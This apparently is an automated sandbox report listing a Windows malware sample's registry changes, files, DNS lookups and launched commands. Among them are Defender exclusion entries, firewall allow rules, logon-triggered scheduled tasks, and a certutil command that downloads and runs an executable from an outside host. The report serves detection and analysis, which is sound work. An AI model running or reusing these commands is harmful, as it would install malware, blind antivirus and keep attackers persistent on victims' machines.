Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'RedSky' = '"%WINDIR%\rss\csrss.exe"'
- <SYSTEM32>\tasks\csrss
- <SYSTEM32>\tasks\scheduledupdate
- Windows Update
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\rss' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%APPDATA%\c0076d9f0a83' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\csrss' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%APPDATA%\RedSky' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\windefender.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\wup' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '<DRIVERS>' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] 'csrss.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] 'c0076d9f0a83.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] 'windefender.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] '<File name>.exe' = '00000000'
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\c0076d9f0a83\c0076d9f0a83.exe" enable=yes
- %WINDIR%\explorer.exe
- %WINDIR%\rss\csrss.exe
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\lt-lt\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\lb-lu\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\ko-kr\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\ja-jp\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\it-it\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\is-is\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\hu-hu\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\hr-hr\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\he-il\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\gl-es\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\fr-xf\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\fr-fr\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\fr-ch\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\fr-ca\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\fr-be\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\lv-lv\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\ms-my\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\nb-no\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\nl-be\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\zh-cn\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\vi-vn\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\uk-ua\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\tr-tr\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\th-th\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\sv-se\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\sr-latn-rs\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\sk-sk\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\sl-si\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\ru-ru\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\ro-ro\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\pt-pt\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\pt-br\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\pl-pl\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\nn-no\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\nl-nl\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\zh-hk\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\fi-fi\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\eu-es\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\et-ee\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\de-ch\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\de-at\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\da-dk\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\cs-cz\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\ca-es-valencia\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\ca-es\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\bg-bg\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\ar-sa\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\metadata.json
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content.cab
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\config_132488261502750000.json
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{7303707f-5807-4495-a0d9-0a019805f686}\config_132488261494730000.json
- %ProgramFiles%\unp\updatenotificationmgr\updatenotificationcatalog.json
- %TEMP%\csrss\patch.exe
- nul
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\de-de\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\el-gr\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-au\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-ca\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\es-us\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\es-mx\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\es-es\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\es-co\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\es-cl\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\es-ar\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-za\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-ph\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-us\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-nz\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-my\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-in\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-ie\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-id\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-hk\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\en-gb\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\es-xl\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- %ProgramFiles%\unp\updatenotificationmgr\unpcampaigns\{222ddb7c-4cb2-47ea-9193-8fb14e6b9e60}\content1\zh-tw\8a27f2ca-9fcd-4181-9520-7fa56b86b178.xml
- from %ProgramFiles%\unp\logs\updatenotificationpipeline.001.etl to %ProgramFiles%\unp\logs\updatenotificationpipeline.002.etl
- %ProgramFiles%\UNP\Logs\UpdateNotificationPipeline.001.etl
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?0b##############
- http://dl.delivery.mp.microsoft.com/filestreamingservice/files/0c5390a3-cf80-41fa-8037-771fb7b66e00/MUSE-19H1_EOS.cab
- DNS ASK ea####design.com
- DNS ASK bb#############b73-96d1-c82cac163f65.easywbdesign.com
- DNS ASK se#####.easywbdesign.com
- DNS ASK go.microsoft.com
- DNS ASK share.microsoft.com
- DNS ASK settings-win.data.microsoft.com
- DNS ASK ba###tef.com
- DNS ASK maps.windows.com
- DNS ASK dl.delivery.mp.microsoft.com
- '%WINDIR%\rss\csrss.exe' ""
- '%TEMP%\csrss\patch.exe'
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\c0076d9f0a83\c0076d9f0a83.exe" enable=yes"' (with hidden window)
- '%WINDIR%\rss\csrss.exe' ""' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /TR "%WINDIR%\rss\csrss.exe" /TN csrss /F' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe %TEMP%\csrss\scheduled.exe && %TEMP%\csrss\scheduled.exe /31340" /TN...' (with hidden window)
- '%TEMP%\csrss\patch.exe' ' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' /v' (with hidden window)
- '<SYSTEM32>\devicecensus.exe'
- '<SYSTEM32>\apphostregistrationverifier.exe'
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes"
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\c0076d9f0a83\c0076d9f0a83.exe" enable=yes"
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /TR "%WINDIR%\rss\csrss.exe" /TN csrss /F
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe %TEMP%\csrss\scheduled.exe && %TEMP%\csrss\scheduled.exe /31340" /TN...
- '<SYSTEM32>\bcdedit.exe' /v
- '<SYSTEM32>\devicecensus.exe' UserCxt
- '<SYSTEM32>\svchost.exe' -k netsvcs -p